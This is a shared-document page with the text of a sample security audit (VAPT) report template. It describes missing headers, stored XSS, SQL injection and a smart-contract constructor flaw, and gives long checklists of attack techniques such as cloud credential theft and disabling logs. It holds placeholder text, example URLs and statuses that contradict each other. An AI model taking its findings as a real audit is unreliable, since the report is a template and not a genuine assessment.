Abstract image of a woman sitting on books and studying on a laptop

Astra-Security-Sample-VAPT-Report leadind auditt.pdf

B
bipinbhattarai12

This security audit report for www.getastra.com details vulnerabilities identified in the Goldcast web application and its backend dashboards. Key findings included several missing API security headers, a stored cross-site scripting vulnerability, and SQL injection risks, some of which have been resolved while others remain unsolved. The report emphasizes the importance of implementing recommended security practices to mitigate the identified risks.

Engineering
1 of 28
Download to read offline
1
2
Most read
3
Most read
4
Most read
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
SECURITY AUDIT REPORT FOR www.getastra.com Confidential MY BUSINESS ATTENTION: This document contains information from Astra IT, Inc. & Czar Securities Pvt. Ltd. that is confidential and privileged. The information is intended for private use of the client. By accepting this document you agree to keep the contents in confidence and not copy, disclose, or distribute this without written request to and written confirmation from Astra IT, Inc. & Czar Securities Pvt. Ltd. If you are not the intended recipient, be aware that any disclosure, copying, or distribution of the contents of this document is prohibited. April 05, 2021 COPYRIGHT © ASTRA IT, INC. All rights reserved. hello@getastra.com
Document Details Confidential Title Details COMPLETED ON: REPORT TYPE: VALIDITY: APRIL 02, 2021 MANUAL SCAN 30 DAYS
Table of Contents 1. Executive Summary 1.1 Scope of Testing 1.2 Graphical Summary 1.3 List of Vulnerabilities 2. Discovered Vulnerabilities Details 3. List of Tests Performed 3.1 OWASP Top 10 3.2 SANS 25 Software Errors/Tests 3.3 Other Test Cases 3.4 Server-Level Test Cases 3.5 Test Cases for Windows 3.6 Test Cases for Android / iOS 3.7 Test Cases for Cloud (AWS, Azure, GCP, and Other) 3.8 Test Cases for Blockchain Confidential 2
1. Executive Summary This document contains the initial security assessment report for : {Goldcast Web application and its backend dashboards.} The purpose of this assessment was to point out security loopholes, business logic errors, and missing best security practices. The tests were carried out assuming the identity of an attacker or a malicious user but no harm was made to the functionality or working of the application/network. Security assessment includes testing for security loopholes in the scope defined below. Apart from the following, no other information was provided. Nothing was assumed at the start of the security assessment. The following was the scope covered under the security audit: 1.1 Scope of Testing Application 1: {URL1} Application 2: {URL2} Confidential 3 The below graphical representations from Astra's VAPT dashboard will provide you an overall summary of the security audit scan results, including, vulnerabilities discovered, severity, respective CVSS Score, and other vulnerability details such as its impact, detailed PoC, steps to reproduce, affected URLs/network parameters, and recommended fixes. 1.2 Graphical Summary Graph 1: Issues Type Graph 2: Severity Type
Confidential 4 Vulnerability Severity No. of Vulnerability found Critical High Medium Low Recommendations 0 1 2 4 0 Voluptas voluptates ipsa eos natus. 1 Low Voluptas voluptates ipsa eos natus. 2 Medium Voluptas voluptates ipsa eos natus. 3 Low Voluptas voluptates ipsa eos natus. 4 High Voluptas voluptates ipsa eos natus. 5 Low Voluptas voluptates ipsa eos natus. 6 Medium Voluptas voluptates ipsa eos natus. 7 Low Closed Closed Closed Closed Closed Closed Closed 1.3 List of Vulnerabilities # Vulnerability Severity Status CVSS Score 6 7 5 9 6 7 5
We were able to detect that the following API security headers are missing 1. Content Security Polic 2. Strict Transport Securit 3. X-Content-Type-Optio A CSP is an important standard by the W3C that is aimed to prevent a broad range of content injection attacks such as cross-site scripting (XSS), data injection attacks, packet sniffing attacks etc. It is a declarative policy that informs the user agent what are valid sources to load resources from Missing Content-Type header means that this website could be at risk of a MIME- sniffing attacks. Missing Strict Transport Security header means that the application fails to prevent users from connecting to it over unencrypted connections. An attacker able to modify a legitimate user's network traffic could bypass the application's use of SSL/TLS encryption, and use the application as a platform for attacks against its users. 2. Discovered Vulnerabilities Details Vulnerability #1 Missing API Security Headers CVSS Score 5.4 Status: Unsolved Severity: Medium Details of Vulnerability: Confidential 5 Impact: https://www.example.com/reference https://test.com/reference Additional References: Suggested Fixes: Affected URL: Sitewide
Vulnerability #2 Stored Cross-Site Scripting (XSS) CVSS Score 7.7 Status: Resolved Severity: High Confidential 6 Stored XSS Vulnerability was found on the affected URLs. This allows an attacker to inject a script which gets stored in the application. When a victim navigates to the affected web page in a browser, the XSS payload will be served as part of the web page. This means that victims will inadvertently end-up executing the malicious script once the page is viewed in a browser. Details of Vulnerability: Stealing the victim's session token Stealing Login credential Stealing customer Credit Card Information The attacker-supplied code can perform a wide variety of actions, such as Impact: https://www.example.com/reference https://test.com/reference Additional References: In order to prevent Stored XSS attacks, the best way is to handle the input securely in both client-side and server-side code in a proper manner before it gets stored permanently on the web server. Suggested Fix 2 Suggested Fixes: Affected URL: http://example.com/test1n https://example.com/test2
Vulnerability #3 SQL Injection CVSS Score 5 Status: Resolved Severity: Medium Confidential 7 SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query. Details of Vulnerability: https://www.example.com/reference https://test.com/reference Additional References: The most effective way to prevent SQL injection attacks is to use parameterized queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterized queries. Suggested Fix 2 Suggested Fixes: The JSON parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the JSON parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.### HTTP Requests ###/CRUX/UIDL/ Steps to reproduce: Affected URL: https://www.example.co/form7
Constructors are special functions that are called only once during the contract creation. They often perform critical, privileged actions such as setting the owner of the contract. Before Solidity version 0.4.22, the only way of defining a constructor was to create a function with the same name as the contract class containing it. A function meant to become a constructor becomes a normal, callable function if its name doesn't exactly match the contract name. This behavior sometimes leads to security issues, in particular when smart contract code is re-used with a different name but the name of the constructor function is not changed accordingly. Vulnerability #4 Incorrect Contructor Name CVSS Score 6.3 Status: Unsolved Severity: Medium Confidential 8 Details of Vulnerability: https://swcregistry.io/docs/SWC-118 Additional References: Solidity version 0.4.22 introduces a new constructor keyword that make a constructor definitions clearer. It is therefore recommended to upgrade the contract to a recent version of the Solidity compiler and change to the new constructor declaration. Suggested Fixes: Steps to reproduce: Affected URL: https://www.hacked.co
OWASP Top 10 # 3. List of VAPT Tests Performed The following lists of tests are suggestive & not limited to the ones listed. Most importantly, every test case has multiple sub-test cases ranging from a few to sometimes 1000+ sub tests. Additional test cases will be performed based on factors such as: Technology Stack Server Side Programming Language, Front-end frameworks Framework/CMS/APIs Type of application (Payment integrations, external integrations) 1. 2. 3. 4. Confidential 9 Insufficient Logging and Monitoring SQL Injection Broken Authentication Sensitive Data Exposure XML External Entities (XXL) Broken Access Control Security Misconfiguration Cross-Site Scripting (XSS) Insecure Deserialization Using Components with Known Vulnerabilities 10 1 2 3 4 5 6 7 8 9 for Web Applications for Mobile Applications Extraneous Functionality Improper Platform Usage Insecure Data Storage Insecure Communication Insecure Authentication Insufficient Cryptography Insecure Authorization Client Mode Quality Code Tampering Reverse Engineering 10 1 2 3 4 5 6 7 8 9 3.1 OWASP Top 10
Confidential 10 SANS 25 Improper Restriction of Operations within the Bounds of a Memory Buffer Improper Neutralization of Input During Web Page Generation ('XSS') Improper Input Validation Information Exposure Out-of-bounds Read Improper Neutralization of Special Elements used in an SQL Command (SQLi) Use After Free Integer Overflow or Wraparound Cross-Site Request Forgery (CSRF) Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') Improper Neutralization of Special Elements used in an OS Command Out-of-bounds Write Improper Authentication NULL Pointer Dereference Incorrect Permission Assignment for Critical Resource Unrestricted Upload of File with Dangerous Type Improper Restriction of XML External Entity Reference Improper Control of Generation of Code ('Code Injection') Uncontrolled Resource Consumption Missing Release of Resource after Effective Lifetime Untrusted Search Path Deserialization of Untrusted Data Improper Certificate Validation Use of Hard-coded Credentials Improper Privilege Management # 25 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 3.2 SANS 25 Software Errors/Tests
Other Tests Typical Severity OS Command Injection SQL Injection (Second Order) XML External Entity Injection LDAP Injection XPath Injection XML Injection ASP.NET Debugging Enabled DoS Locking Customer Accounts DoS Buffer Overflows Storing too much data in session (DoS) Writing user-provided data to disk (DoS) HTTP Insecure methods available on Server Out of band resource load (HTTP) File path manipulation Server-site JavaScript code injection Perl code injection Ruby code injection Python code injection Expression Language injection Unidentified code injection Client-side SQLi (Stored DOM-based) Server-side template injection SSL injection Stored XSS HTTP response header injection Reflected XSS Client-side template injection DOM-based XSS Reflected DOM-based XSS Stored DOM-based XSS DOM-based JavaScript Injection Reflected DOM-based JavaScript Injection Stored DOM-based JavaScript Injection Path-relative style sheet import Client-side SQLi (DOM-based) Client-side SQLi (Reflected DOM-based) # 35 36 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 High High High High High High High High Medium Medium High High High High High High High High High High High High High High High High High High High High High High High Information High High Confidential 11 3.3 174 Other Test Cases
Other Test performed Typical Severity Duplicate cookies set WebSocket Hijacking (DOM-based) WebSocket Hijacking (Reflected DOM-based) WebSocket Hijacking (Stored DOM-based) Local Path Manipulation (DOM-based) Local Path Manipulation (Reflected DOM) Local Path Manipulation (Stored DOM-based) Client-side XPATH Injection (DOM-based) Client-side XPATH Injection (Reflected DOM) Client-side XPATH Injection (Stored DOM) Client-side JSON Injection (DOM-based) Client-side JSON Injection (Reflected DOM) Client-side JSON Injection (Stored DOM-based) Flash cross-domain policy Cross-origin resource sharing Cross-origin resource sharing (arbitrary) Cross-origin resource sharing (encrypted) Cross-origin resource sharing (all sub-domains) Cross-site Request Forgery (CSRF) SMTP header injection Cleartext submission of password External service interaction (DNS) External service interaction (HTTP) External service interaction (SMTP) Referrer dependent response Spoofable client IP address User-agent dependent response Password returned in a later response Password submitted using GET method Password returned in URL query string SQL statement in request parameter Cross-domain POST ASP.NET ViewState without MAC Enabled XML entity expansion Long redirection response Serialized object in HTTP message # 72 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 High High High High High High Low Low Low Low Low Low High Information High Low Low Medium Medium High High High Information Information Information Information Medium Low Low Medium Information Low Medium Information High Information Confidential 12
Other Test performed Typical Severity Duplicate cookies set WebSocket Hijacking (DOM-based) WebSocket Hijacking (Reflected DOM-based) WebSocket Hijacking (Stored DOM-based) Local Path Manipulation (DOM-based) Local Path Manipulation (Reflected DOM) Local Path Manipulation (Stored DOM-based) Client-side XPATH Injection (DOM-based) Client-side XPATH Injection (Reflected DOM) Client-side XPATH Injection (Stored DOM) Client-side JSON Injection (DOM-based) Client-side JSON Injection (Reflected DOM) Client-side JSON Injection (Stored DOM-based) Flash cross-domain policy Cross-origin resource sharing Cross-origin resource sharing (arbitrary) Cross-origin resource sharing (encrypted) Cross-origin resource sharing (all sub-domains) Cross-site Request Forgery (CSRF) SMTP header injection Cleartext submission of password External service interaction (DNS) External service interaction (HTTP) External service interaction (SMTP) Referrer dependent response Spoofable client IP address User-agent dependent response Password returned in a later response Password submitted using GET method Password returned in URL query string SQL statement in request parameter Cross-domain POST ASP.NET ViewState without MAC Enabled XML entity expansion Long redirection response Serialized object in HTTP message # 108 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 High High High High High High Low Low Low Low Low Low High Information High Low Low Medium Medium High High High Information Information Information Information Medium Low Low Medium Information Low Medium Information High Information Confidential 13
Other Test performed Typical Severity Link manipulation (DOM-based) Input returned in response (stored) Input returned in response (reflected) Suspicious input transformation (reflected) Suspicious input transformation (stored) Open redirection (stored) Open redirection (reflected) Open redirection (DOM-based) Open redirection (Stored DOM-based) Open redirection (Reflected DOM-based) SSl cookie without secure flag set Cookie scoped to parent domain Cross-domain referrer leakage Cross-domain script include Cookie without HTTPOnly flag set Session token in URL Password field with autocomplete enabled Password value set in cookie Browser cross-site scripting disabled HTTP TRACE method is enabled Cookie manipulation (DOM-based) Cookie manipulation (reflected DOM-based) Cookie manipulation (DOM-based) Ajax request header manipulation (DOM-based) Ajax request header manipulation (reflected) Ajax request header manipulation (stored DOM) Denial of service (DOM-based) Denial of service (reflected DOM-based) Denial of service (stored DOM-based) HTML5 web message manipulation DOM-based HTML5 web message manipulation (reflected) HTML5 web message manipulation (stored DOM) HTML5 storage manipulation (DOM-based) HTML5 storage manipulation (reflected DOM) HTML5 storage manipulation (stored DOM) # 143 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 Low Information Information Information Information Low Medium Low Low Medium Medium Low Information Information Low Medium Low Medium Infomration Information Low Low Low Low Low Low Information Information Low Information Information Information Information Information Information Confidential 14
Other Test performed Typical Severity Mixed content Link manipulation (reflected DOM-based) Link manipulation (stored DOM-based) Link manipulation (reflected & stored) Document domain manipulation (DOM-based) Document domain manipulation reflected DOM Document domain manipulation (stored DOM) DOM data manipulation (DOM-based) CSS Injection (reflected & stored) Client-side HTTP parameter pollution (reflected) Client-side HTTP parameter pollution (Stored) Form action hijacking (reflected) Form action hijacking (stored) Database connection string disclosed Source code disclosure Directory listing Email addresses disclosed Private IP addresses disclosed Social security numbers disclosed Credit card numbers disclosed Private key disclosed Cacheable HTTPS response Base64 encoded data in parameter Multiple content types specified HTML does not specify charset HTML uses unrecognized charset Content type incorrectly stated Content ty[e is not specified SSL certificate Unencrypted communications Strict transport security not enforced # 174 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 Information Low Low Information Medium Medium Medium Information Medium Low Low Medium Medium Medium Low Information Information Information Information Information Information Information Information Information Information Information Low Information Medium Low Low Confidential 15
Confidential 16 Server - Level Testing 3.4 Server - Level Test Cases Information Gathering Test RIA Cross-domain Policy Fingerprint Web Server Test Network/Infrastructure Configuration Test HTTP Methods Test HTTP Strict Transport Security (HSTS) Testing for Cookies Attributes 6 1 2 3 4 5 SSL/TLS Testing Insufficient public key length HeartBleed POODLE SSL Vulnerability ChangeCipherSpec Injection BREACH BEAST Forward Secrecy Support RC4 Support CRIME & Time Vulnerabilities Lucky13 HSTS: Check for header HSTS: Reasonable duration of MAX-AGE HSTS: Check for SubDomains support Certificate expiration 20 7 8 9 10 11 12 13 14 15 16 17 18 19
Confidential 17 Host Name mismatch Weak/Insecure Hashing Algorithm SSLv2 support Weak ciphers check (Low, Anon, Null, Export) Null prefix in the certificate HTTPS stripping SurfJacking Non-SSL elements/content embedded in SSL Page Cache control 29 21 22 23 24 25 26 27 28 Configuration and Deploy Management Testing Test RIA cross domain policy Test Network/Infrastructure Configuration Test HTTP Methods Test HTTP Strict Transport Security Testing for Cookies Attributes 34 30 31 32 33 Cryptography Test HTTP Strict Transport Security Testing of Weak SSL/TLS Ciphers, Insufficient Transport layer Test HTTP Methods 37 35 36
Confidential 18 Test Cases for Windows 3.5 Test Cases for Windows
Confidential 19
Test Cases for Android Confidential 20 3.6 Test Cases for Android and iOS
Confidential 21
Confidential 22 Test Cases for iOS
Confidential 23
Test Cases for Cloud Services Test for credential stealing attack on operation of a cloud key management service Test for Unauthenticated database access Test for Improper permissions for Database Test for compromising access keys Test for extracting keys from a VM / instance Test for exploits due to improper configs. Testing for public exploits in VM / instances Test for backdoors exploitation internally Test for Subdomain Takeover Test for access mgmt. Privilege Escalation Test for Remote Code Execution (RCE) Test for Role Enumeration Test for VM service Privilege Escalation Test for IAM Enumeration Test for BitBucket Server Data for credentials Test for cloud compromise by DNS rebinding Test for local Windows/Linux logs change Test for loopholes that add root certificates and SSH private keys to VMs and users Test for loopholes that assign a secondary private IP address to an instance / VM when you launch the instance / VM Test for unauthenticated obtaining of the VM images from storage accounts and do an analysis for passwords, keys, certificates to penetrate and access live resources Test for penetrating OS-level access to Instances/VMs via Workload Test for Management Service Privileges Test to run or deploy a workload with an assigned service or role and export instance credentials for those privileges Test for server and application versions & frameworks fingerprinting and detect exposed sensitive PII in server/application logs Test for CSV injection Test for MITM attack penetration on Elastic Load Balancer (ELB) for session hijacking Test for credential stealing attack on credentials Test for credential stealing attack on cloud workload # 28 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 3.7 Tests Cases for Cloud (AWS, Azure, GCP, and Other) Confidential 24
Test to alter data in datastore for fraudulent transactions or static website compromise Test to alter a serverless function, logic app or otherwise a business logic implementation for action on objective or escalation Test to alter a DNS Record record set in a trusted zone and/or certificates for the resource record set to divert traffic, create phishing sites & abuse the brand (AWS ACM, AWS Route53, Azure DNS Service) Test to alter data in local SQL or MySQL databases Operate in regions where logging is not enabled or disable global logging (like CloudTrail) Test to alter log files in a non-validated log store or disable validation (like CloudTrail Log Validation) Test for Disable network traffic analysis/logging (VPC Flow Logs) Test for Disable Cloud Alerting to prevent detection and response Test for Disable data store access logging to prevent detection and response (CloudTrail Data Access, S3 Access Logging, etc.) Test to alter log retention or damage the integrity of logs (S3 lifecycle, KMS decryption, CMK key deletion/role privilege lockout) Process hooking, process injection, Windows access token manipulation, leveraging misconfigured sudo capabilities Test to create or reset a login, access key, or temporary credential belonging to a high privilege user (like IAM: CreateAccessKey, STS, or IAM: UpdateLoginProfile) Test to Change the default policy for a user or new users to include additional privileges (like Set-Default-Policy-Version) Leverage data or code pipelines to execute operations on behalf of their assumed roles (AWS data pipeline Shell-Command-Activity, inject python code into a pickle celery SQS queue) 29 30 31 32 33 34 35 36 37 38 39 40 41 42 Confidential 25
Test Cases for Cloud Services Test for Function Default Visibility Test for Unencrypted Private Data On-Chain Test for Code With No Effects Test for Message call with hardcoded gas amount Test for Unexpected Ether balance Test for Hash Collisions With Multiple Variable Length Arguments Testing for Presence of unused variables Test for Right-To-Left-Override control character (U+202E) Test for Typographical Error Test for DoS With Block Gas Limit Test for Arbitrary Jump with Function Type Variable Test for Insufficient Gas Griefing Test for Incorrect Inheritance Order Test for Writing to Arbitrary Storage Location Test for Requirement Violation Test for Lack of Proper Signature Verification Test for local Missing Protection against Signature Replay Attacks Test for Weak Sources of Randomness from Chain Attributes Test for Shadowing State Variables Test for Incorrect Constructor Name Test for Signature Malleability Test for Blocking values as a proxy for time Test for Authorization through tx.origin Test for Transaction Order Dependence Test for DoS with Failed Call Test for Delegatecall to Untrusted Callee Test for Use of Deprecated Solidity Functions Test for Assert Violation Test for Uninitialized Storage Pointer Test for State Variable Default Visibility Test for Reentrancy Test for Unprotected SELFDESTRUCT Instruction Test for Unprotected Ether Withdrawal Test for Unchecked Call Return Value Test for Floating Pragma Test for Outdated Compiler Version Test for Integer Overflow and Underflow # 37 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 3.7 Tests Cases for Blockchain Confidential 26
Your plug & play cyber security suite. Questions? Contact us at hello@getastra.com

More Related Content

PDF
SecDevOps for API Security
42Crunch
 
PPTX
Securing the Web @RivieraDev2016
Sumanth Damarla
 
PDF
OWASP Top 10 Overview
PiTechnologies
 
PPTX
owasp features in secure coding techniques
Sri Latha
 
PDF
OWASP Top 10
Arthur Shvetsov
 
PDF
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
PPTX
Security guidelines
karthz
 
PPTX
Owasp top 10 vulnerabilities
OWASP Delhi
 
SecDevOps for API Security
42Crunch
 
Securing the Web @RivieraDev2016
Sumanth Damarla
 
OWASP Top 10 Overview
PiTechnologies
 
owasp features in secure coding techniques
Sri Latha
 
OWASP Top 10
Arthur Shvetsov
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
Lewis Ardern
 
Security guidelines
karthz
 
Owasp top 10 vulnerabilities
OWASP Delhi
 

Similar to Astra-Security-Sample-VAPT-Report leadind auditt.pdf (20)

PPTX
You are not excused! How to avoid security blind spots on the way to production
Michele Leroux Bustamante
 
PPTX
OWASP Top 10 - 2017 Top 10 web application security risks
Kun-Da Wu
 
PDF
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
All Things Open
 
PDF
Webinar | Cybersecurity vulnerabilities of your business - Berezha Security G...
Go Global
 
PPTX
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Lostar
 
PDF
apidays Australia 2023 - API Security Breach Analysis & Empowering Devs to M...
apidays
 
PDF
The API Primer (OWASP AppSec Europe, May 2015)
Greg Patton
 
PDF
OWASP Top 10 2017
Siddharth Phatarphod
 
PDF
apidays New York 2023 - A decade of API breaches, courtesy of application fla...
apidays
 
PPTX
Web app security essentials
Rafał Hryniewski
 
PDF
Black and Blue APIs: Attacker's and Defender's View of API Vulnerabilities
Matt Tesauro
 
PPTX
Application-security-Javascript.pptx
DBALLIANCE Ltd UK
 
PDF
C01461422
IOSR Journals
 
PDF
Security Awareness
Lucas Hendrich
 
PDF
2022 Vulnerability Statistics Report.pdf
ssuserc3d7ec1
 
PDF
Edgescan 2022 Vulnerability Statistics Report
Eoin Keary
 
PDF
API Vulnerabilties and What to Do About Them
Eoin Woods
 
PDF
Webinar–OWASP Top 10 for JavaScript for Developers
Synopsys Software Integrity Group
 
PPTX
Secure Coding: SSL, SOAP, and REST
Salesforce Developers
 
PPTX
DevBeat 2013 - Developer-first Security
Coverity
 
You are not excused! How to avoid security blind spots on the way to production
Michele Leroux Bustamante
 
OWASP Top 10 - 2017 Top 10 web application security risks
Kun-Da Wu
 
OWASP Top 10 - The Ten Most Critical Web Application Security Risks
All Things Open
 
Webinar | Cybersecurity vulnerabilities of your business - Berezha Security G...
Go Global
 
Top 10 Web Application Security Risks - Murat Lostar @ ISACA EUROCACS 2013
Lostar
 
apidays Australia 2023 - API Security Breach Analysis & Empowering Devs to M...
apidays
 
The API Primer (OWASP AppSec Europe, May 2015)
Greg Patton
 
OWASP Top 10 2017
Siddharth Phatarphod
 
apidays New York 2023 - A decade of API breaches, courtesy of application fla...
apidays
 
Web app security essentials
Rafał Hryniewski
 
Black and Blue APIs: Attacker's and Defender's View of API Vulnerabilities
Matt Tesauro
 
Application-security-Javascript.pptx
DBALLIANCE Ltd UK
 
C01461422
IOSR Journals
 
Security Awareness
Lucas Hendrich
 
2022 Vulnerability Statistics Report.pdf
ssuserc3d7ec1
 
Edgescan 2022 Vulnerability Statistics Report
Eoin Keary
 
API Vulnerabilties and What to Do About Them
Eoin Woods
 
Webinar–OWASP Top 10 for JavaScript for Developers
Synopsys Software Integrity Group
 
Secure Coding: SSL, SOAP, and REST
Salesforce Developers
 
DevBeat 2013 - Developer-first Security
Coverity
 
Ad

Recently uploaded (20)

PDF
Java Basics-Introduction and program control
lohithsrikarb719
 
PPTX
ASME PCC-02 TRAINING -DESKTOP-NLE5HNP.pptx
laxmikantvjawale
 
PPTX
Management Information system : MIS-e-Business Systems.pptx
ShankarGowda22
 
PPTX
mechattonicsand iotwith sensor and actuator
hrtec3
 
PPTX
"Array and Linked List in Data Structures with Types, Operations, Implementat...
usham61
 
PPTX
Building constraction Conveyance of water.pptx
SidharthKamble9
 
PDF
Artificial Superintelligence (ASI) Alliance Vision Paper.pdf
SonaliPatil325517
 
PDF
Prof. Dr. KAYIHURA A. SILAS MUNYANEZA, PhD..pdf
Rutherford University of Science and Technology, Rwanda
 
PPTX
Chemical Technological Processes, Feasibility Study and Chemical Process Indu...
Raihan87
 
PDF
MLpara ingenieira CIVIL, meca Y AMBIENTAL
MarceloArielTisera
 
PPTX
Module 8- Technological and Communication Skills.pptx
Ramya Nellutla
 
PDF
UEFA_Embodied_Carbon_Emissions_Football_Infrastructure.pdf
tuchinad02
 
PDF
Computer System Architecture 3rd Edition-M Morris Mano.pdf
Nune SrinivasRao
 
PPTX
Feature types and data preprocessing steps
deepalishinkar1
 
PPTX
Chapter 2 -Technology and Enginerring Materials + Composites.pptx
garciajeremiah070
 
PDF
20250617 - IR - Global Guide for HR - 51 pages.pdf
JanBaumann6
 
PDF
Accra-Kumasi Expressway - Prefeasibility Report Volume 1 of 7.11.2018.pdf
JeorgeWilsonKingson1
 
PDF
Exploratory_Data_Analysis_Fundamentals.pdf
Ashutosh Satapathy
 
PDF
Unit I -OPERATING SYSTEMS_SRM_KATTANKULATHUR.pptx.pdf
HarshDudhatra4
 
PDF
Applications of Equal_Area_Criterion.pdf
Puja Gurav
 
Java Basics-Introduction and program control
lohithsrikarb719
 
ASME PCC-02 TRAINING -DESKTOP-NLE5HNP.pptx
laxmikantvjawale
 
Management Information system : MIS-e-Business Systems.pptx
ShankarGowda22
 
mechattonicsand iotwith sensor and actuator
hrtec3
 
"Array and Linked List in Data Structures with Types, Operations, Implementat...
usham61
 
Building constraction Conveyance of water.pptx
SidharthKamble9
 
Artificial Superintelligence (ASI) Alliance Vision Paper.pdf
SonaliPatil325517
 
Prof. Dr. KAYIHURA A. SILAS MUNYANEZA, PhD..pdf
Rutherford University of Science and Technology, Rwanda
 
Chemical Technological Processes, Feasibility Study and Chemical Process Indu...
Raihan87
 
MLpara ingenieira CIVIL, meca Y AMBIENTAL
MarceloArielTisera
 
Module 8- Technological and Communication Skills.pptx
Ramya Nellutla
 
UEFA_Embodied_Carbon_Emissions_Football_Infrastructure.pdf
tuchinad02
 
Computer System Architecture 3rd Edition-M Morris Mano.pdf
Nune SrinivasRao
 
Feature types and data preprocessing steps
deepalishinkar1
 
Chapter 2 -Technology and Enginerring Materials + Composites.pptx
garciajeremiah070
 
20250617 - IR - Global Guide for HR - 51 pages.pdf
JanBaumann6
 
Accra-Kumasi Expressway - Prefeasibility Report Volume 1 of 7.11.2018.pdf
JeorgeWilsonKingson1
 
Exploratory_Data_Analysis_Fundamentals.pdf
Ashutosh Satapathy
 
Unit I -OPERATING SYSTEMS_SRM_KATTANKULATHUR.pptx.pdf
HarshDudhatra4
 
Applications of Equal_Area_Criterion.pdf
Puja Gurav
 
Ad

Astra-Security-Sample-VAPT-Report leadind auditt.pdf

  • 1. SECURITY AUDIT REPORT FOR www.getastra.com Confidential MY BUSINESS ATTENTION: This document contains information from Astra IT, Inc. & Czar Securities Pvt. Ltd. that is confidential and privileged. The information is intended for private use of the client. By accepting this document you agree to keep the contents in confidence and not copy, disclose, or distribute this without written request to and written confirmation from Astra IT, Inc. & Czar Securities Pvt. Ltd. If you are not the intended recipient, be aware that any disclosure, copying, or distribution of the contents of this document is prohibited. April 05, 2021 COPYRIGHT © ASTRA IT, INC. All rights reserved. hello@getastra.com
  • 2. Document Details Confidential Title Details COMPLETED ON: REPORT TYPE: VALIDITY: APRIL 02, 2021 MANUAL SCAN 30 DAYS
  • 3. Table of Contents 1. Executive Summary 1.1 Scope of Testing 1.2 Graphical Summary 1.3 List of Vulnerabilities 2. Discovered Vulnerabilities Details 3. List of Tests Performed 3.1 OWASP Top 10 3.2 SANS 25 Software Errors/Tests 3.3 Other Test Cases 3.4 Server-Level Test Cases 3.5 Test Cases for Windows 3.6 Test Cases for Android / iOS 3.7 Test Cases for Cloud (AWS, Azure, GCP, and Other) 3.8 Test Cases for Blockchain Confidential 2
  • 4. 1. Executive Summary This document contains the initial security assessment report for : {Goldcast Web application and its backend dashboards.} The purpose of this assessment was to point out security loopholes, business logic errors, and missing best security practices. The tests were carried out assuming the identity of an attacker or a malicious user but no harm was made to the functionality or working of the application/network. Security assessment includes testing for security loopholes in the scope defined below. Apart from the following, no other information was provided. Nothing was assumed at the start of the security assessment. The following was the scope covered under the security audit: 1.1 Scope of Testing Application 1: {URL1} Application 2: {URL2} Confidential 3 The below graphical representations from Astra's VAPT dashboard will provide you an overall summary of the security audit scan results, including, vulnerabilities discovered, severity, respective CVSS Score, and other vulnerability details such as its impact, detailed PoC, steps to reproduce, affected URLs/network parameters, and recommended fixes. 1.2 Graphical Summary Graph 1: Issues Type Graph 2: Severity Type
  • 5. Confidential 4 Vulnerability Severity No. of Vulnerability found Critical High Medium Low Recommendations 0 1 2 4 0 Voluptas voluptates ipsa eos natus. 1 Low Voluptas voluptates ipsa eos natus. 2 Medium Voluptas voluptates ipsa eos natus. 3 Low Voluptas voluptates ipsa eos natus. 4 High Voluptas voluptates ipsa eos natus. 5 Low Voluptas voluptates ipsa eos natus. 6 Medium Voluptas voluptates ipsa eos natus. 7 Low Closed Closed Closed Closed Closed Closed Closed 1.3 List of Vulnerabilities # Vulnerability Severity Status CVSS Score 6 7 5 9 6 7 5
  • 6. We were able to detect that the following API security headers are missing 1. Content Security Polic 2. Strict Transport Securit 3. X-Content-Type-Optio A CSP is an important standard by the W3C that is aimed to prevent a broad range of content injection attacks such as cross-site scripting (XSS), data injection attacks, packet sniffing attacks etc. It is a declarative policy that informs the user agent what are valid sources to load resources from Missing Content-Type header means that this website could be at risk of a MIME- sniffing attacks. Missing Strict Transport Security header means that the application fails to prevent users from connecting to it over unencrypted connections. An attacker able to modify a legitimate user's network traffic could bypass the application's use of SSL/TLS encryption, and use the application as a platform for attacks against its users. 2. Discovered Vulnerabilities Details Vulnerability #1 Missing API Security Headers CVSS Score 5.4 Status: Unsolved Severity: Medium Details of Vulnerability: Confidential 5 Impact: https://www.example.com/reference https://test.com/reference Additional References: Suggested Fixes: Affected URL: Sitewide
